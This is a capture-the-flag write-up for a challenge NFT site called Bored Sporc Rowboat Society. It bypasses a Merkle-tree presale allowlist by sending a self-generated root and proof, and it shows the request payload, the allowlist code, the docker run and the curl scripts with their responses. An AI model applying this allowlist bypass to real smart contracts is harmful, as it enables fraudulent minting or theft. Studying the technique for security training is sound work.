Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.
The The Bored Sporc Rowboat Society web site has three pages:
At first let's do a simple check using the presale page and following information:
Let's look at the web console and we see a POST
request to https://boredsporcrowboatsociety.com/cgi-bin/presale with following payload:
{
"WalletID":"0x(yourownaddress)",
"Root":"0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80",
"Proof":"0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b",
"Validate":"true",
"Session":"7819373f-f635-44b1-96b1-65ec01c9426f"
}
So it seems all we need is a valid Merkle Tree, it's Root and a Proof. Let's create one using this repo. The only code changes necessary are (for the other 2 leafs just take a address from the gallery page):
allowlist = ["0xa1861E96DeF10987E1793c8f77E811032069f8E9", "0x(yourownaddress)", "0xc249927fb81bde4eA7B9Dc9e4c9E6F503F147fe2"]
print('Proof:', mt.get_proof(Web3.solidityKeccak(['bytes'], ["0x(yourownaddress)"])))
Run it using docker:
docker build -t merkletrees .
docker run -it --rm --name=merkletrees merkletrees
mt_user@566f02498986:~$ python3 merkle_tree.py
Root: 0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80
Proof: ['0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b']
We'll go back to the web site and copy the original presale call using the deveveloper tools and copy that request as cURL request (saved here as check.sh
. We substitute the root and proof in the payload with the values from our python script:
└─$ ./check.sh
{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}
We'll note the society wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a
and use a KTM to transfer 100KC. We run the same script with the parameter changed "Validate":"false"
:
└─$ ./transfer.sh
{"Response": "Success! You are now the proud owner of BSRS Token #000179. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS179, or check it out in the gallery!<br>Transaction: 0xb44139083a7bdd6181c464b1a31640d4bec2275d0ad9d00c8bf67ff371f5aa07, Block: 61904<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}
Indeed we have a beautiful Sporc NFT: